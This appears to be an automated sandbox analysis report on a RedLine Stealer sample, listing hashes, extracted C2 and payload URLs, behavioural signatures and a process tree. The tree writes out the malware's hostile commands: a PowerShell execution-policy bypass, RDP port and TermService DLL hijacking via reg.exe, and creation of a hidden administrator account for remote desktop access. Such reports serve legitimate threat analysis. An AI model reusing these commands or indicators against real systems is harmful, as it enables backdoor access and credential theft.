Analysis
-
max time kernel
111s -
max time network
163s -
platform
windows10_x64 -
resource
win10v20210410 -
submitted
07-06-2021 11:42
Static task
static1
Behavioral task
behavioral1
Sample
ustwo_20210607-133958.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
ustwo_20210607-133958.exe
Resource
win10v20210410
General
-
Target
ustwo_20210607-133958.exe
-
Size
120KB
-
MD5
bc3443ee6ebeac5b40d789367a61cc36
-
SHA1
3aca0e6d34866853b9ed702d76e0222952451eb4
-
SHA256
875f42b4ae4e80050231b14e50770f8e51a7b1f9887504ab6699860c9d37d09c
-
SHA512
bb2450f210eb7ab34a51c91b28edbfb671570d47a9c8033fd74dc1437c2e99107e4052a8a6a911b6ccf5d29fa206bb173064a83ea47cddd83819079260430240
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Extracted
redline
N6
lyanannaron.xyz:80
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2324-124-0x0000000000417D76-mapping.dmp family_redline behavioral2/memory/2324-123-0x0000000000400000-0x000000000041E000-memory.dmp family_redline -
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 6 IoCs
Processes:
powershell.exeflow pid process 25 4056 powershell.exe 27 4056 powershell.exe 28 4056 powershell.exe 29 4056 powershell.exe 31 4056 powershell.exe 33 4056 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 1 IoCs
Processes:
filename.exepid process 3260 filename.exe -
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
Processes:
resource yara_rule \Windows\Branding\mediasrv.png upx \Windows\Branding\mediasvc.png upx -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 1728 powershell.exe -
Loads dropped DLL 2 IoCs
Processes:
pid process 2980 2980 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 20 ipinfo.io 21 ipinfo.io -
Suspicious use of SetThreadContext 1 IoCs
Processes:
ustwo_20210607-133958.exedescription pid process target process PID 3992 set thread context of 2324 3992 ustwo_20210607-133958.exe ustwo_20210607-133958.exe -
Drops file in Program Files directory 4 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI powershell.exe File opened for modification C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT powershell.exe -
Drops file in Windows directory 18 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File created C:\Windows\branding\wupsvc.jpg powershell.exe File opened for modification C:\Windows\branding\Basebrd powershell.exe File opened for modification C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA52D.tmp powershell.exe File opened for modification C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat powershell.exe File opened for modification C:\Windows\branding\mediasvc.png powershell.exe File opened for modification C:\Windows\branding\wupsvc.jpg powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_qboewj5a.h2y.ps1 powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File created C:\Windows\branding\mediasrv.png powershell.exe File opened for modification C:\Windows\branding\ShellBrd powershell.exe File created C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_lztjzhpr.yka.psm1 powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA50C.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA51C.tmp powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA52E.tmp powershell.exe File created C:\Windows\branding\mediasvc.png powershell.exe File created C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP powershell.exe File opened for modification C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIA4EB.tmp powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1400 = "3" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnableNegotiate = "1" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Description = "This zone contains all Web sites that are on your organization's intranet." powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\ powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0 powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\1400 = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\PMDisplayName = "Internet [Protected Mode]" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\ powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Description = "This zone contains Web sites that could potentially damage your computer or data." powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag," powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1200 = "3" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\DisplayName = "Trusted sites" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Set value (data) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\e1be3f182420a0a0 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c000000 powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\LowIcon = "inetcpl.cpl#005423" powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Icon = "inetcpl.cpl#00004480" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows powershell.exe Set value (str) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\Icon = "inetcpl.cpl#00004481" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0" powershell.exe Set value (int) \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3" powershell.exe Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 28 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 29 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 31 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 27 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 20 IoCs
Processes:
ustwo_20210607-133958.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2324 ustwo_20210607-133958.exe 2324 ustwo_20210607-133958.exe 1728 powershell.exe 1728 powershell.exe 1728 powershell.exe 4016 powershell.exe 4016 powershell.exe 4016 powershell.exe 2284 powershell.exe 2284 powershell.exe 2284 powershell.exe 2884 powershell.exe 2884 powershell.exe 2884 powershell.exe 1728 powershell.exe 1728 powershell.exe 1728 powershell.exe 4056 powershell.exe 4056 powershell.exe 4056 powershell.exe -
Suspicious behavior: LoadsDriver 2 IoCs
Processes:
pid process 620 620 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
ustwo_20210607-133958.exeustwo_20210607-133958.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3992 ustwo_20210607-133958.exe Token: SeDebugPrivilege 2324 ustwo_20210607-133958.exe Token: SeDebugPrivilege 1728 powershell.exe Token: SeDebugPrivilege 4016 powershell.exe Token: SeIncreaseQuotaPrivilege 4016 powershell.exe Token: SeSecurityPrivilege 4016 powershell.exe Token: SeTakeOwnershipPrivilege 4016 powershell.exe Token: SeLoadDriverPrivilege 4016 powershell.exe Token: SeSystemProfilePrivilege 4016 powershell.exe Token: SeSystemtimePrivilege 4016 powershell.exe Token: SeProfSingleProcessPrivilege 4016 powershell.exe Token: SeIncBasePriorityPrivilege 4016 powershell.exe Token: SeCreatePagefilePrivilege 4016 powershell.exe Token: SeBackupPrivilege 4016 powershell.exe Token: SeRestorePrivilege 4016 powershell.exe Token: SeShutdownPrivilege 4016 powershell.exe Token: SeDebugPrivilege 4016 powershell.exe Token: SeSystemEnvironmentPrivilege 4016 powershell.exe Token: SeRemoteShutdownPrivilege 4016 powershell.exe Token: SeUndockPrivilege 4016 powershell.exe Token: SeManageVolumePrivilege 4016 powershell.exe Token: 33 4016 powershell.exe Token: 34 4016 powershell.exe Token: 35 4016 powershell.exe Token: 36 4016 powershell.exe Token: SeDebugPrivilege 2284 powershell.exe Token: SeIncreaseQuotaPrivilege 2284 powershell.exe Token: SeSecurityPrivilege 2284 powershell.exe Token: SeTakeOwnershipPrivilege 2284 powershell.exe Token: SeLoadDriverPrivilege 2284 powershell.exe Token: SeSystemProfilePrivilege 2284 powershell.exe Token: SeSystemtimePrivilege 2284 powershell.exe Token: SeProfSingleProcessPrivilege 2284 powershell.exe Token: SeIncBasePriorityPrivilege 2284 powershell.exe Token: SeCreatePagefilePrivilege 2284 powershell.exe Token: SeBackupPrivilege 2284 powershell.exe Token: SeRestorePrivilege 2284 powershell.exe Token: SeShutdownPrivilege 2284 powershell.exe Token: SeDebugPrivilege 2284 powershell.exe Token: SeSystemEnvironmentPrivilege 2284 powershell.exe Token: SeRemoteShutdownPrivilege 2284 powershell.exe Token: SeUndockPrivilege 2284 powershell.exe Token: SeManageVolumePrivilege 2284 powershell.exe Token: 33 2284 powershell.exe Token: 34 2284 powershell.exe Token: 35 2284 powershell.exe Token: 36 2284 powershell.exe Token: SeDebugPrivilege 2884 powershell.exe Token: SeIncreaseQuotaPrivilege 2884 powershell.exe Token: SeSecurityPrivilege 2884 powershell.exe Token: SeTakeOwnershipPrivilege 2884 powershell.exe Token: SeLoadDriverPrivilege 2884 powershell.exe Token: SeSystemProfilePrivilege 2884 powershell.exe Token: SeSystemtimePrivilege 2884 powershell.exe Token: SeProfSingleProcessPrivilege 2884 powershell.exe Token: SeIncBasePriorityPrivilege 2884 powershell.exe Token: SeCreatePagefilePrivilege 2884 powershell.exe Token: SeBackupPrivilege 2884 powershell.exe Token: SeRestorePrivilege 2884 powershell.exe Token: SeShutdownPrivilege 2884 powershell.exe Token: SeDebugPrivilege 2884 powershell.exe Token: SeSystemEnvironmentPrivilege 2884 powershell.exe Token: SeRemoteShutdownPrivilege 2884 powershell.exe Token: SeUndockPrivilege 2884 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
ustwo_20210607-133958.exeustwo_20210607-133958.exefilename.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exedescription pid process target process PID 3992 wrote to memory of 2324 3992 ustwo_20210607-133958.exe ustwo_20210607-133958.exe PID 3992 wrote to memory of 2324 3992 ustwo_20210607-133958.exe ustwo_20210607-133958.exe PID 3992 wrote to memory of 2324 3992 ustwo_20210607-133958.exe ustwo_20210607-133958.exe PID 3992 wrote to memory of 2324 3992 ustwo_20210607-133958.exe ustwo_20210607-133958.exe PID 3992 wrote to memory of 2324 3992 ustwo_20210607-133958.exe ustwo_20210607-133958.exe PID 3992 wrote to memory of 2324 3992 ustwo_20210607-133958.exe ustwo_20210607-133958.exe PID 3992 wrote to memory of 2324 3992 ustwo_20210607-133958.exe ustwo_20210607-133958.exe PID 3992 wrote to memory of 2324 3992 ustwo_20210607-133958.exe ustwo_20210607-133958.exe PID 2324 wrote to memory of 3260 2324 ustwo_20210607-133958.exe filename.exe PID 2324 wrote to memory of 3260 2324 ustwo_20210607-133958.exe filename.exe PID 3260 wrote to memory of 1728 3260 filename.exe powershell.exe PID 3260 wrote to memory of 1728 3260 filename.exe powershell.exe PID 1728 wrote to memory of 200 1728 powershell.exe csc.exe PID 1728 wrote to memory of 200 1728 powershell.exe csc.exe PID 200 wrote to memory of 3160 200 csc.exe cvtres.exe PID 200 wrote to memory of 3160 200 csc.exe cvtres.exe PID 1728 wrote to memory of 4016 1728 powershell.exe powershell.exe PID 1728 wrote to memory of 4016 1728 powershell.exe powershell.exe PID 1728 wrote to memory of 2284 1728 powershell.exe powershell.exe PID 1728 wrote to memory of 2284 1728 powershell.exe powershell.exe PID 1728 wrote to memory of 2884 1728 powershell.exe powershell.exe PID 1728 wrote to memory of 2884 1728 powershell.exe powershell.exe PID 1728 wrote to memory of 3888 1728 powershell.exe reg.exe PID 1728 wrote to memory of 3888 1728 powershell.exe reg.exe PID 1728 wrote to memory of 3940 1728 powershell.exe reg.exe PID 1728 wrote to memory of 3940 1728 powershell.exe reg.exe PID 1728 wrote to memory of 900 1728 powershell.exe reg.exe PID 1728 wrote to memory of 900 1728 powershell.exe reg.exe PID 1728 wrote to memory of 636 1728 powershell.exe net.exe PID 1728 wrote to memory of 636 1728 powershell.exe net.exe PID 636 wrote to memory of 2408 636 net.exe net1.exe PID 636 wrote to memory of 2408 636 net.exe net1.exe PID 1728 wrote to memory of 2296 1728 powershell.exe cmd.exe PID 1728 wrote to memory of 2296 1728 powershell.exe cmd.exe PID 2296 wrote to memory of 372 2296 cmd.exe cmd.exe PID 2296 wrote to memory of 372 2296 cmd.exe cmd.exe PID 372 wrote to memory of 3144 372 cmd.exe net.exe PID 372 wrote to memory of 3144 372 cmd.exe net.exe PID 3144 wrote to memory of 3392 3144 net.exe net1.exe PID 3144 wrote to memory of 3392 3144 net.exe net1.exe PID 1728 wrote to memory of 3332 1728 powershell.exe cmd.exe PID 1728 wrote to memory of 3332 1728 powershell.exe cmd.exe PID 3332 wrote to memory of 3984 3332 cmd.exe cmd.exe PID 3332 wrote to memory of 3984 3332 cmd.exe cmd.exe PID 3984 wrote to memory of 2328 3984 cmd.exe net.exe PID 3984 wrote to memory of 2328 3984 cmd.exe net.exe PID 2328 wrote to memory of 936 2328 net.exe net1.exe PID 2328 wrote to memory of 936 2328 net.exe net1.exe PID 684 wrote to memory of 2232 684 cmd.exe net.exe PID 684 wrote to memory of 2232 684 cmd.exe net.exe PID 2232 wrote to memory of 3052 2232 net.exe net1.exe PID 2232 wrote to memory of 3052 2232 net.exe net1.exe PID 2736 wrote to memory of 2784 2736 cmd.exe net.exe PID 2736 wrote to memory of 2784 2736 cmd.exe net.exe PID 2784 wrote to memory of 3680 2784 net.exe net1.exe PID 2784 wrote to memory of 3680 2784 net.exe net1.exe PID 2352 wrote to memory of 1972 2352 cmd.exe net.exe PID 2352 wrote to memory of 1972 2352 cmd.exe net.exe PID 1972 wrote to memory of 900 1972 net.exe net1.exe PID 1972 wrote to memory of 900 1972 net.exe net1.exe PID 1340 wrote to memory of 3184 1340 cmd.exe net.exe PID 1340 wrote to memory of 3184 1340 cmd.exe net.exe PID 3184 wrote to memory of 3144 3184 net.exe net1.exe PID 3184 wrote to memory of 3144 3184 net.exe net1.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ustwo_20210607-133958.exe"C:\Users\Admin\AppData\Local\Temp\ustwo_20210607-133958.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ustwo_20210607-133958.exeC:\Users\Admin\AppData\Local\Temp\ustwo_20210607-133958.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\filename.exe"C:\Users\Admin\AppData\Local\Temp\filename.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'4⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s4uxyrte\s4uxyrte.cmdline"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6543.tmp" "c:\Users\Admin\AppData\Local\Temp\s4uxyrte\CSC940AA4FF2B0A4866A69C7916656BD38D.TMP"6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f5⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f5⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f5⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add6⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService7⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f5⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f5⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc CMmJStNp /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc CMmJStNp /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc CMmJStNp /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
